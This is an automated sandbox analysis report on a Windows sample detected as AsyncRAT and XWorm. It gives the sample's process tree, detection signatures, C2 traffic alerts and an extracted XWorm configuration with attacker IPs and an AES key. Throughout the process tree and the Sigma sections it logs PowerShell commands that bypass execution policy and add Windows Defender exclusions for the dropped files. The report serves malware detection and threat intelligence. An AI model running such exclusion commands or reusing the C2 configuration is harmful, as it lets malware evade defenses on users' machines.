Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dLRcE11Dkl.exe

Overview

General Information

Sample name:dLRcE11Dkl.exe
renamed because original name is a hash value
Original sample name:7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab.exe
Analysis ID:1561590
MD5:68157ed3390faca2a327e25148f4bd97
SHA1:d5fa29334ce471ceac94be49a39d9398b13c8505
SHA256:7eea25e9951efaa2c861551b031678b70e9e733c096877be5491457cb28561ab
Tags:exeuser-Chainskilabs
Infos:

Detection

AsyncRAT, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Drops PE files with benign system names
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • dLRcE11Dkl.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\dLRcE11Dkl.exe" MD5: 68157ED3390FACA2A327E25148F4BD97)
    • All function.cmd (PID: 5032 cmdline: "C:\Users\user\AppData\Roaming\All function.cmd" MD5: FBD77E256063E3D225B8ECEC3BDBD6DB)
      • Task Manager.exe (PID: 6876 cmdline: "C:\Users\user\AppData\Roaming\Task Manager.exe" MD5: C5ACDDD1F31EA152420CD0BEC24636BA)
        • powershell.exe (PID: 5144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Task Manager.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 2884 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Task Manager.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • All function.exe (PID: 1472 cmdline: "C:\Users\user\AppData\Roaming\All function.exe" MD5: 7F9590397ABD938CFD86A9A7A6E51EF6)
        • Ratty_win32_directx11.exe (PID: 2096 cmdline: "C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exe" MD5: D3565F59BBADCCEDED3D00831AF9B9E9)
        • BLACKGODDOM V.2 GOD BY LA.exe (PID: 5492 cmdline: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" MD5: 2B1BCFF698482A45A0D01356AD3E0384)
          • powershell.exe (PID: 5396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5676 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'BLACKGODDOM V.2 GOD BY LA.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 5236 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 1020 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: E9A629DD7B0ACCDA9D7696FC15135663)
      • powershell.exe (PID: 6596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7040 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AsyncRATAsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["45.141.27.222"], "Port": 5000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
    C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x83c2:$s6: VirtualBox
        • 0x8320:$s8: Win32_ComputerSystem
        • 0x8d88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x8e25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x8f3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x8a00:$cnc4: POST / HTTP/1.1
        C:\Users\user\AppData\Roaming\svchost.exeJoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 5 entries

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
            00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x2af52:$s6: VirtualBox
            • 0x3b592:$s6: VirtualBox
            • 0x2aeb0:$s8: Win32_ComputerSystem
            • 0x3b4f0:$s8: Win32_ComputerSystem
            • 0x2d06a:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x3d6aa:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x2d107:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x3d747:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x2d21c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x3d85c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x2c0ea:$cnc4: POST / HTTP/1.1
            • 0x3c72a:$cnc4: POST / HTTP/1.1
            00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
              00000000.00000002.2121511846.00000000027F1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x32666:$s6: VirtualBox
              • 0x440a6:$s6: VirtualBox
              • 0x325c4:$s8: Win32_ComputerSystem
              • 0x44004:$s8: Win32_ComputerSystem
              • 0x34e05:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x46845:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x34ea2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x468e2:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x34fb7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x469f7:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x34269:$cnc4: POST / HTTP/1.1
              • 0x45ca9:$cnc4: POST / HTTP/1.1
              00000007.00000000.2169879127.0000000000E12000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                Click to see the 17 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpackJoeSecurity_AsyncRATYara detected AsyncRATJoe Security
                  7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      7.0.BLACKGODDOM V.2 GOD BY LA.exe.e10000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0x83c2:$s6: VirtualBox
                      • 0x8320:$s8: Win32_ComputerSystem
                      • 0x8d88:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0x8e25:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0x8f3a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0x8a00:$cnc4: POST / HTTP/1.1
                      2.2.All function.cmd.2eafcc0.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
                        Click to see the 32 entries

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\dLRcE11Dkl.exe, ProcessId: 2848, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
                        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, ParentProcessId: 5492, ParentProcessName: BLACKGODDOM V.2 GOD BY LA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', ProcessId: 5396, ProcessName: powershell.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe, ParentProcessId: 5492, ParentProcessName: BLACKGODDOM V.2 GOD BY LA.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exe', ProcessId: 5396, ProcessName: powershell.exe
                        Sigma detected: System File Execution Location Anomaly
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1020, ProcessName: svchost.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
                        Sigma detected: Execution of Suspicious File Type Extension
                        Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\All function.cmd" , CommandLine: "C:\Users\user\AppData\Roaming\All function.cmd" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\All function.cmd, NewProcessName: C:\Users\user\AppData\Roaming\All function.cmd, OriginalFileName: C:\Users\user\AppData\Roaming\All function.cmd, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\All function.cmd" , ProcessId: 5032, ProcessName: All function.cmd
                        Sigma detected: Powershell Defender Exclusion
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1020, ProcessName: svchost.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ParentImage: C:\Users\user\AppData\Roaming\svchost.exe, ParentProcessId: 1020, ParentProcessName: svchost.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe', ProcessId: 6596, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\dLRcE11Dkl.exe", ParentImage: C:\Users\user\Desktop\dLRcE11Dkl.exe, ParentProcessId: 2848, ParentProcessName: dLRcE11Dkl.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 1020, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-23T21:09:33.285602+010028528701Malware Command and Control Activity Detected45.141.27.2487777192.168.2.649991TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-23T21:09:33.354089+010028529231Malware Command and Control Activity Detected192.168.2.64999145.141.27.2487777TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-11-23T21:09:32.706821+010028559241Malware Command and Control Activity Detected192.168.2.64999145.141.27.2487777TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: dLRcE11Dkl.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Roaming\All function.cmdAvira: detection malicious, Label: TR/Dropper.Gen
                        Source: C:\Users\user\AppData\Roaming\svchost.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Roaming\All function.exeAvira: detection malicious, Label: TR/Dropper.Gen
                        Found malware configuration
                        Source: 00000002.00000002.2133502093.0000000002E91000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["45.141.27.222"], "Port": 5000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeReversingLabs: Detection: 95%
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeReversingLabs: Detection: 62%
                        Source: C:\Users\user\AppData\Roaming\All function.cmdReversingLabs: Detection: 79%
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Roaming\svchost.exeReversingLabs: Detection: 91%
                        Multi AV Scanner detection for submitted file
                        Source: dLRcE11Dkl.exeReversingLabs: Detection: 68%
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\BLACKGODDOM V.2 GOD BY LA.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\Ratty_win32_directx11.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\Task Manager.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\All function.cmdJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\svchost.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\All function.exeJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: dLRcE11Dkl.exeJoe Sandbox ML: detected
                        Sample uses string decryption to hide its real strings
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: 45.141.27.248
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: 7777
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: <123456789>
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: <Xwormmm>
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: XWorm V5.4
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: USB.exe
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: %AppData%
                        Source: 0.2.dLRcE11Dkl.exe.2815e68.2.raw.unpackString decryptor: svchost.exe
                        Source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b3b9f9c2-c
                        Source: dLRcE11Dkl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: dLRcE11Dkl.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: DC:\Users\Asz\Downloads\SBAGGY\examples\example_win32_directx11\Release\example_win32_directx11.pdb source: Ratty_win32_directx11.exe, 00000006.00000000.2167454709.00007FF77147A000.00000002.00000001.01000000.0000000A.sdmp
